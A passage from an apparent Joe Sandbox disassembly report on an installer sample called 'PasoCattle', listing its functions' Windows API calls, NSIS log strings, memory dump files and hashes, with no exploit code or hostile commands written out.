                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2568930968-0
                                                                                                                                                                          • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                          • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                          • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                          • API String ID: 247603264-1827671502
                                                                                                                                                                          • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                          • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                          • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                          • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                          • API String ID: 3156913733-2180253247
                                                                                                                                                                          • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                          • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                          • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                          • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                          • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                          • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                          • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                          • String ID: HideWindow
                                                                                                                                                                          • API String ID: 1249568736-780306582
                                                                                                                                                                          • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                          • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                          • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                          • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                          APIs
                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                          • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                          • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                          • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                          • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                          • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                          • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                          • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                          • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                          APIs
                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                          • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                          • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                          • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                          • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4115351271-0
                                                                                                                                                                          • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                          • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                          • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                          • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                          • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                          • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
